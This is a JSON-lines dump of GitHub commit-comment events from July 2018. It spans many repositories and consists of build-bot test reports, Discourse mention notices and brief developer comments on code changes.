{"id":"8031615578","type":"CommitCommentEvent","actor":{"login":"cmderden"},"repo":{"name":"MrStevenFeldman/RokuSmartThings"},"payload":{"comment":{"id":29866265,"position":null,"line":null,"path":null,"commit_id":"95cae40fffa275cbde40ce6558ff85b9ea8ca50c","created_at":"2018-07-28T03:59:56Z","updated_at":"2018-07-28T03:59:56Z","author_association":"NONE","body":"so to be clear I must have a dev acct? I have a github acct but do not believe it is a dev"}},"created_at":"2018-07-28T03:59:56Z"}
{"id":"8031618366","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29866275,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T04:02:00Z","updated_at":"2018-07-28T04:02:00Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2357 of 2924 tests passed, 56 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 495 tests had: ESO small diffs.\n * 563 tests had: Table big diffs.\n * 357 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 89 tests had: ESO big diffs.\n * 91 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 34 tests had: ZSZ small diffs.\n * 20 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 12 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 56\n * Failed: 567\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.61%25-red.png)</a> \n"}},"created_at":"2018-07-28T04:02:00Z"}
{"id":"8031623123","type":"CommitCommentEvent","actor":{"login":"GeoZac"},"repo":{"name":"GeoZac/packages_services_OmniJaws"},"payload":{"comment":{"id":29866290,"position":null,"line":null,"path":null,"commit_id":"99c5f468bc86acd03861205814f048e19c026404","created_at":"2018-07-28T04:06:18Z","updated_at":"2018-07-28T04:06:18Z","author_association":"OWNER","body":"Do not cherry-pick,contains syntax errors and typos"}},"created_at":"2018-07-28T04:06:18Z"}
{"id":"8031623270","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29866291,"position":null,"line":null,"path":null,"commit_id":"875008522de225ddcd7b14638b9f054a0acad7b5","created_at":"2018-07-28T04:06:27Z","updated_at":"2018-07-28T04:06:27Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/azure-blob-storage-plugin/79392/49\n"}},"created_at":"2018-07-28T04:06:27Z"}
{"id":"8031626535","type":"CommitCommentEvent","actor":{"login":"winquad"},"repo":{"name":"BayrunnerFuctory/DC_Arduino"},"payload":{"comment":{"id":29866300,"position":null,"line":null,"path":null,"commit_id":"b78de3809e068e3fd7fc866bd20f3c05ba0b8e1f","created_at":"2018-07-28T04:09:27Z","updated_at":"2018-07-28T04:09:27Z","author_association":"COLLABORATOR","body":"実際には作ったが使用していなかった関数を使用するように変更した"}},"created_at":"2018-07-28T04:09:27Z"}
{"id":"8031627453","type":"CommitCommentEvent","actor":{"login":"gbbowers"},"repo":{"name":"gbbowers/designpluscode"},"payload":{"comment":{"id":29866303,"position":null,"line":null,"path":null,"commit_id":"738df8b317576a3adcc84d23ca87b9ceba7a60f6","created_at":"2018-07-28T04:10:17Z","updated_at":"2018-07-28T04:10:17Z","author_association":"OWNER","body":"Huh. The commits are by not me?"}},"created_at":"2018-07-28T04:10:17Z"}
{"id":"8031627502","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866304,"position":null,"line":null,"path":null,"commit_id":"9be523493c4b59aba8e09b2e8d0c6b5c74f29899","created_at":"2018-07-28T04:10:21Z","updated_at":"2018-07-28T04:10:21Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T04:10:21Z"}
{"id":"8031627757","type":"CommitCommentEvent","actor":{"login":"kpurna"},"repo":{"name":"kpurna/python_basic"},"payload":{"comment":{"id":29866307,"position":null,"line":null,"path":null,"commit_id":"e25f0d25deb01d5326c15449840d6c570472a18c","created_at":"2018-07-28T04:10:35Z","updated_at":"2018-07-28T04:10:35Z","author_association":"OWNER","body":"this is worng commit code is not working please check"}},"created_at":"2018-07-28T04:10:35Z"}
{"id":"8031627803","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29866308,"position":null,"line":null,"path":null,"commit_id":"875008522de225ddcd7b14638b9f054a0acad7b5","created_at":"2018-07-28T04:10:38Z","updated_at":"2018-07-28T04:10:38Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/azure-blob-storage-plugin/79392/49\n"}},"created_at":"2018-07-28T04:10:38Z"}
{"id":"8031629169","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29866317,"position":null,"line":null,"path":null,"commit_id":"875008522de225ddcd7b14638b9f054a0acad7b5","created_at":"2018-07-28T04:12:00Z","updated_at":"2018-07-28T04:12:00Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/azure-blob-storage-plugin/79392/49\n"}},"created_at":"2018-07-28T04:12:00Z"}
{"id":"8031629428","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29866320,"position":null,"line":null,"path":null,"commit_id":"875008522de225ddcd7b14638b9f054a0acad7b5","created_at":"2018-07-28T04:12:15Z","updated_at":"2018-07-28T04:12:15Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/azure-blob-storage-plugin/79392/49\n"}},"created_at":"2018-07-28T04:12:15Z"}
{"id":"8031629497","type":"CommitCommentEvent","actor":{"login":"nzrnshah"},"repo":{"name":"nzrnshah/mytestproject"},"payload":{"comment":{"id":29866321,"position":null,"line":null,"path":null,"commit_id":"a6179e118cde551f288f6a750f181ffeec30b1c5","created_at":"2018-07-28T04:12:18Z","updated_at":"2018-07-28T04:12:18Z","author_association":"OWNER","body":"Perubahan ini diterima pakai"}},"created_at":"2018-07-28T04:12:18Z"}
{"id":"8031634013","type":"CommitCommentEvent","actor":{"login":"mengtaovivi"},"repo":{"name":"liangxiaojuan/eleme"},"payload":{"comment":{"id":29866336,"position":4,"line":113,"path":"README.md","commit_id":"7dae203990f3f2612562441574e3b6c8568b2d84","created_at":"2018-07-28T04:16:30Z","updated_at":"2018-07-28T04:16:30Z","author_association":"NONE","body":"404"}},"created_at":"2018-07-28T04:16:30Z"}
{"id":"8031635921","type":"CommitCommentEvent","actor":{"login":"lllnnlll"},"repo":{"name":"lllnnlll/test"},"payload":{"comment":{"id":29866348,"position":null,"line":null,"path":null,"commit_id":"525f8383f1b9bb0500c2624cf2ab7e5ea24de8db","created_at":"2018-07-28T04:18:27Z","updated_at":"2018-07-28T04:18:27Z","author_association":"OWNER","body":"neo.hello=hello im dev lxe"}},"created_at":"2018-07-28T04:18:27Z"}
{"id":"8031636338","type":"CommitCommentEvent","actor":{"login":"ge0rdi"},"repo":{"name":"NeoClassic-UI/Menu"},"payload":{"comment":{"id":29866350,"position":null,"line":null,"path":null,"commit_id":"ad28acaaa37145bc5f556df102207477df54a38a","created_at":"2018-07-28T04:18:55Z","updated_at":"2018-07-28T04:18:55Z","author_association":"MEMBER","body":"@coddec @XenHat \r\nI don't think there is a need to create Github release for every minor change.\r\n\r\nWe can simply put link to latest AppVeyor build from master to the home page.\r\nAppVeyor keeps artifacts for 6 months.\r\n\r\nWe can call it nightly builds and people will know they find latest changes there.\r\n\r\nRelease should be created on substantial changes (like for example that fix for RS5 issue)."}},"created_at":"2018-07-28T04:18:55Z"}
{"id":"8031636798","type":"CommitCommentEvent","actor":{"login":"sddzsdj"},"repo":{"name":"sddzsdj/hello-si"},"payload":{"comment":{"id":29866353,"position":null,"line":null,"path":null,"commit_id":"c540c945ae62aa623b6b7ccc1966ae76b0ef57e8","created_at":"2018-07-28T04:19:24Z","updated_at":"2018-07-28T04:19:24Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-28T04:19:24Z"}
{"id":"8031639283","type":"CommitCommentEvent","actor":{"login":"chdh"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29866366,"position":14,"line":572,"path":"lib/_stream_writable.js","commit_id":"ce83099d3e6f6d7be0e533c19cd7f905bba4ea2a","created_at":"2018-07-28T04:21:49Z","updated_at":"2018-07-28T04:21:49Z","author_association":"CONTRIBUTOR","body":"```\r\nelse\r\n   process.nextTick(cb);\r\n```\r\nShouldn't the callback be called here, if `state.ending` is `true`?"}},"created_at":"2018-07-28T04:21:49Z"}
{"id":"8031640035","type":"CommitCommentEvent","actor":{"login":"moditpc"},"repo":{"name":"well43/dogecoin"},"payload":{"comment":{"id":29866375,"position":7,"line":43,"path":"build-aux/m4/dogecoin_find_bdb51.m4","commit_id":"5ad3dd615e434f5ccb402141c1b07fa20d6249d9","created_at":"2018-07-28T04:22:30Z","updated_at":"2018-07-28T04:22:30Z","author_association":"NONE","body":"  BITCOIN_SUBDIR_TO_INCLUDE(BDB_CPPFLAGS,[${bdbpath}],db_cxx) \r\n  DOGECOIN_SUBDIR_TO_INCLUDE(BDB_CPPFLAGS,[${bdbpath}],db_cxx) "}},"created_at":"2018-07-28T04:22:30Z"}
{"id":"8031649101","type":"CommitCommentEvent","actor":{"login":"mcollina"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29866422,"position":14,"line":572,"path":"lib/_stream_writable.js","commit_id":"ce83099d3e6f6d7be0e533c19cd7f905bba4ea2a","created_at":"2018-07-28T04:31:17Z","updated_at":"2018-07-28T04:31:17Z","author_association":"MEMBER","body":"I _thought_ this change was correct. Can you please provide an example where the current logic fails?"}},"created_at":"2018-07-28T04:31:17Z"}
{"id":"8031650661","type":"CommitCommentEvent","actor":{"login":"krazyito65"},"repo":{"name":"SimCMinMax/AutoSimC"},"payload":{"comment":{"id":29866436,"position":8,"line":74,"path":"launch-ubuntu.sh","commit_id":"48b63773618e48f41f496cad3b81213eb15b22d3","created_at":"2018-07-28T04:32:45Z","updated_at":"2018-07-28T04:32:45Z","author_association":"CONTRIBUTOR","body":"Won't this always return 0 since the last command you did was an echo?"}},"created_at":"2018-07-28T04:32:45Z"}
{"id":"8031652164","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29866438,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-28T04:34:06Z","updated_at":"2018-07-28T04:34:06Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-28T04:34:06Z"}
{"id":"8031652575","type":"CommitCommentEvent","actor":{"login":"ASD505"},"repo":{"name":"mickeyinfoshan/Android-Native-Modules"},"payload":{"comment":{"id":29866439,"position":null,"line":null,"path":null,"commit_id":"ad037cae9ab47525a2a3d86249298941d8b1a5d5","created_at":"2018-07-28T04:34:30Z","updated_at":"2018-07-28T04:34:30Z","author_association":"NONE","body":"أنا بصراحه ماأعرف شي في تصميم البرامج ياليت تعلمني مشكور\r\n"}},"created_at":"2018-07-28T04:34:30Z"}
{"id":"8031655385","type":"CommitCommentEvent","actor":{"login":"dkuspawono"},"repo":{"name":"sky-map-team/stardroid"},"payload":{"comment":{"id":29866451,"position":40,"line":0,"path":".travis.yml","commit_id":"d661b768e3d8e770100a5b483bf2c01d88b72da8","created_at":"2018-07-28T04:37:12Z","updated_at":"2018-07-28T04:37:12Z","author_association":"NONE","body":"***:rocket:***"}},"created_at":"2018-07-28T04:37:12Z"}
{"id":"8031656237","type":"CommitCommentEvent","actor":{"login":"dkuspawono"},"repo":{"name":"sky-map-team/stardroid"},"payload":{"comment":{"id":29866458,"position":40,"line":0,"path":".travis.yml","commit_id":"d661b768e3d8e770100a5b483bf2c01d88b72da8","created_at":"2018-07-28T04:38:02Z","updated_at":"2018-07-28T04:38:02Z","author_association":"NONE","body":"***:rocket:***"}},"created_at":"2018-07-28T04:38:02Z"}
{"id":"8031663741","type":"CommitCommentEvent","actor":{"login":"gs0211"},"repo":{"name":"gs0211/PCSXR"},"payload":{"comment":{"id":29866479,"position":null,"line":null,"path":null,"commit_id":"c8b40468dc5eb2c38941808ec9a1d12aca91cf72","created_at":"2018-07-28T04:45:23Z","updated_at":"2018-07-28T04:45:23Z","author_association":"OWNER","body":"icon"}},"created_at":"2018-07-28T04:45:23Z"}
{"id":"8031663984","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29866480,"position":null,"line":null,"path":null,"commit_id":"afbd70ef96cfceeee28bce173fa3104032964a27","created_at":"2018-07-28T04:45:39Z","updated_at":"2018-07-28T04:45:39Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 724](https://travis-ci.org/per1234/arduino-ci-script/builds/409199983) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00724-001-tsv"}},"created_at":"2018-07-28T04:45:39Z"}
{"id":"8031664065","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29866483,"position":null,"line":null,"path":null,"commit_id":"afbd70ef96cfceeee28bce173fa3104032964a27","created_at":"2018-07-28T04:45:44Z","updated_at":"2018-07-28T04:45:44Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 724](https://travis-ci.org/per1234/arduino-ci-script/builds/409199983) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00724"}},"created_at":"2018-07-28T04:45:44Z"}
{"id":"8031667006","type":"CommitCommentEvent","actor":{"login":"joshukraine"},"repo":{"name":"joshukraine/mac-bootstrap"},"payload":{"comment":{"id":29866492,"position":null,"line":null,"path":null,"commit_id":"4ea310e4cc1eea1321f8db8ae7cf874db3b89000","created_at":"2018-07-28T04:48:48Z","updated_at":"2018-07-28T04:48:48Z","author_association":"OWNER","body":"@Bartuz Good question. 🙂 It's been a while since I made this change, and I honestly don't remember for certain all the reasons that led to it. I believe it was primarily done to make it easier to stay up to date with the thoughtbot's original Laptop script. Every time I update mac-bootstrap, I diff with the latest version of Laptop to see what, if anything, I want to integrate.\r\n\r\nBottom line: I'm open to reverting back to the Brewfile approach if you'd like to do a PR. Thanks for the feedback!"}},"created_at":"2018-07-28T04:48:48Z"}
{"id":"8031668898","type":"CommitCommentEvent","actor":{"login":"MrStevenFeldman"},"repo":{"name":"MrStevenFeldman/RokuSmartThings"},"payload":{"comment":{"id":29866497,"position":null,"line":null,"path":null,"commit_id":"95cae40fffa275cbde40ce6558ff85b9ea8ca50c","created_at":"2018-07-28T04:50:41Z","updated_at":"2018-07-28T04:50:41Z","author_association":"OWNER","body":"Its just a samsung account, you should be able to login here: https://graph.api.smartthings.com/\r\n\r\nNote: I plan to merge the dev branch into master tonight/tomorrow, so you might want to try that one instead"}},"created_at":"2018-07-28T04:50:41Z"}
{"id":"8031669524","type":"CommitCommentEvent","actor":{"login":"arpanSRKroy"},"repo":{"name":"arpandon/examgoal"},"payload":{"comment":{"id":29866499,"position":null,"line":null,"path":null,"commit_id":"c09e0d999672fb568fac0a5424dd3f1b2de5d063","created_at":"2018-07-28T04:51:19Z","updated_at":"2018-07-28T04:51:19Z","author_association":"NONE","body":"f"}},"created_at":"2018-07-28T04:51:19Z"}
{"id":"8031671017","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29866500,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-28T04:52:48Z","updated_at":"2018-07-28T04:52:48Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-28T04:52:48Z"}
{"id":"8031671192","type":"CommitCommentEvent","actor":{"login":"cmderden"},"repo":{"name":"MrStevenFeldman/RokuSmartThings"},"payload":{"comment":{"id":29866502,"position":null,"line":null,"path":null,"commit_id":"95cae40fffa275cbde40ce6558ff85b9ea8ca50c","created_at":"2018-07-28T04:53:00Z","updated_at":"2018-07-28T04:53:00Z","author_association":"NONE","body":"Will wait then. Tried installing from the original code, looked good at\nfirst, but quickly became a S-show due to connection errors.\n\nQuick question...is this supposed to run in both classic and new APP, or\nonly one. Less than a week on ST and the two app thing drives me crazy.\n\nOn Fri, Jul 27, 2018, 11:50 PM Steven Feldman <notifications@github.com>\nwrote:\n\n> Its just a samsung account, you should be able to login here:\n> https://graph.api.smartthings.com/\n>\n> Note: I plan to merge the dev branch into master tonight/tomorrow, so you\n> might want to try that one instead\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MrStevenFeldman/RokuSmartThings/commit/95cae40fffa275cbde40ce6558ff85b9ea8ca50c#commitcomment-29866497>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/An1bqX1AARXALb4kyVk5e4LQplDBqoTWks5uK-2hgaJpZM4Vk5H7>\n> .\n>\n"}},"created_at":"2018-07-28T04:53:00Z"}
{"id":"8031671544","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29866507,"position":null,"line":null,"path":null,"commit_id":"5da627c19b60bda2ae73b3359504a72f6a8256f5","created_at":"2018-07-28T04:53:22Z","updated_at":"2018-07-28T04:53:22Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1026](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1026).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1026-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-28T04:53:22Z"}
{"id":"8031673940","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866514,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-28T04:55:53Z","updated_at":"2018-07-28T04:55:53Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-28T04:55:53Z"}
{"id":"8031674090","type":"CommitCommentEvent","actor":{"login":"Moxieaaa"},"repo":{"name":"Moxieaaa/GitForTest"},"payload":{"comment":{"id":29866515,"position":null,"line":null,"path":null,"commit_id":"b68b936b7fe82b553aa33cb3b2a4967c44181b34","created_at":"2018-07-28T04:56:02Z","updated_at":"2018-07-28T04:56:02Z","author_association":"OWNER","body":"这是什么？"}},"created_at":"2018-07-28T04:56:02Z"}
{"id":"8031675039","type":"CommitCommentEvent","actor":{"login":"aryunaabhay"},"repo":{"name":"hyp3rventures/PKHUD"},"payload":{"comment":{"id":29866520,"position":29,"line":29,"path":"PKHUD/PKHUDToastView.swift","commit_id":"dc77df80257b06ef3f5f3d88f1a7be3d685f4cd6","created_at":"2018-07-28T04:57:01Z","updated_at":"2018-07-28T04:57:01Z","author_association":"NONE","body":"actually there is no need to create this class to set the frame we need, I just commit a change in dev changing the frame for the pkhudview so it seems we now only need the change for the center 'cause we dont actually need preferred font or dark mode since we can do that modifyin the pkhud textview as we were doing before."}},"created_at":"2018-07-28T04:57:01Z"}
{"id":"8031675283","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866521,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-28T04:57:15Z","updated_at":"2018-07-28T04:57:15Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T04:57:15Z"}
{"id":"8031676336","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29866526,"position":null,"line":null,"path":null,"commit_id":"9db24aa2e965d8469d000a7429679fd06c048406","created_at":"2018-07-28T04:58:15Z","updated_at":"2018-07-28T04:58:15Z","author_association":"MEMBER","body":"The `tgaiden` crash is probably caused by it setting a zero visible area.  Since SVG \"screens\" now calculate aspect ratio based on visible area, it's getting upset.  Resolution changes seem odd - it should now be get a reduced fraction for the screen size now."}},"created_at":"2018-07-28T04:58:15Z"}
{"id":"8031677128","type":"CommitCommentEvent","actor":{"login":"gopigana"},"repo":{"name":"gopigana/gopi"},"payload":{"comment":{"id":29866528,"position":null,"line":null,"path":null,"commit_id":"3d29a8bcd7075bd8e684d06e6be4e7fc5c46c41d","created_at":"2018-07-28T04:58:55Z","updated_at":"2018-07-28T04:58:55Z","author_association":"OWNER","body":"Hai.This is my initial commit"}},"created_at":"2018-07-28T04:58:55Z"}
{"id":"8031677416","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29866533,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T04:59:10Z","updated_at":"2018-07-28T04:59:10Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - i386-Windows-7-VisualStudio-14: OK (2924 of 2924 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T04:59:10Z"}
{"id":"8031678985","type":"CommitCommentEvent","actor":{"login":"jockeryeens"},"repo":{"name":"mohankr/Superuser"},"payload":{"comment":{"id":29866543,"position":null,"line":null,"path":null,"commit_id":"ce6c2d48f3dcbb26b737374a200b67b7e642fdb4","created_at":"2018-07-28T05:00:28Z","updated_at":"2018-07-28T05:00:28Z","author_association":"NONE","body":"ce6c2d4"}},"created_at":"2018-07-28T05:00:28Z"}
{"id":"8031679613","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866544,"position":null,"line":null,"path":null,"commit_id":"7b685614a6f29ddc74b220a77efa0a902c38d3b6","created_at":"2018-07-28T05:01:02Z","updated_at":"2018-07-28T05:01:02Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2950 of 2951 tests passed, 2 test warnings)\n\nMessages:\n\n * 3 tests had: ERR diffs.\n * 1 test had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 623\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-28T05:01:02Z"}
{"id":"8031684467","type":"CommitCommentEvent","actor":{"login":"classmusic111"},"repo":{"name":"classmusic111/tset"},"payload":{"comment":{"id":29866567,"position":1,"line":1,"path":"c++","commit_id":"5d170f54dc3dce6523d4403c9144f30ddbfcc663","created_at":"2018-07-28T05:05:25Z","updated_at":"2018-07-28T05:05:25Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-28T05:05:25Z"}
{"id":"8031684793","type":"CommitCommentEvent","actor":{"login":"classmusic111"},"repo":{"name":"classmusic111/tset"},"payload":{"comment":{"id":29866568,"position":null,"line":null,"path":null,"commit_id":"5d170f54dc3dce6523d4403c9144f30ddbfcc663","created_at":"2018-07-28T05:05:42Z","updated_at":"2018-07-28T05:05:42Z","author_association":"OWNER","body":"122"}},"created_at":"2018-07-28T05:05:42Z"}
{"id":"8031685138","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29866571,"position":null,"line":null,"path":null,"commit_id":"9db24aa2e965d8469d000a7429679fd06c048406","created_at":"2018-07-28T05:06:00Z","updated_at":"2018-07-28T05:06:00Z","author_association":"MEMBER","body":"Turns out using the SGV's dimensions as resolution is a bad idea, 9164b0c5bd86ce44df4783e6a26173c04dd90202 changes that back again."}},"created_at":"2018-07-28T05:06:00Z"}
{"id":"8031685989","type":"CommitCommentEvent","actor":{"login":"xiaoyuluoke"},"repo":{"name":"boboandFreya/QtCode"},"payload":{"comment":{"id":29866576,"position":null,"line":null,"path":null,"commit_id":"d41c14560ad513b5736a75ba4fd4a35c7887a997","created_at":"2018-07-28T05:06:51Z","updated_at":"2018-07-28T05:06:51Z","author_association":"MEMBER","body":"# Qt学习总结\r\n\r\n- ## Qt控件命名规则\r\n\r\n  - ## "}},"created_at":"2018-07-28T05:06:51Z"}
{"id":"8031688163","type":"CommitCommentEvent","actor":{"login":"cfinegan"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29866584,"position":null,"line":null,"path":null,"commit_id":"eb3bc11a0dd8f61f39188e05c565d227a59d155c","created_at":"2018-07-28T05:08:52Z","updated_at":"2018-07-28T05:08:52Z","author_association":"COLLABORATOR","body":"Yes, it fixed the problem with the tests automatically returning S64s. The next failing test has to do with floating point remainders."}},"created_at":"2018-07-28T05:08:52Z"}
{"id":"8031692530","type":"CommitCommentEvent","actor":{"login":"aviknayakusa"},"repo":{"name":"aviknayakusa/Data-science"},"payload":{"comment":{"id":29866593,"position":null,"line":null,"path":null,"commit_id":"126710afbc99b8eb1e275d7626ec7c168331daa0","created_at":"2018-07-28T05:12:47Z","updated_at":"2018-07-28T05:12:47Z","author_association":"OWNER","body":"Read Me"}},"created_at":"2018-07-28T05:12:47Z"}
{"id":"8031692797","type":"CommitCommentEvent","actor":{"login":"yzqiu0"},"repo":{"name":"yzqiu0/RightClickOpen"},"payload":{"comment":{"id":29866595,"position":null,"line":null,"path":null,"commit_id":"2bc519ec4e62e537e37cbe30ab122e2bc3e82076","created_at":"2018-07-28T05:13:02Z","updated_at":"2018-07-28T05:13:02Z","author_association":"OWNER","body":"Add recognition of \"file name\" and now can open or browse in a view without a name!"}},"created_at":"2018-07-28T05:13:02Z"}
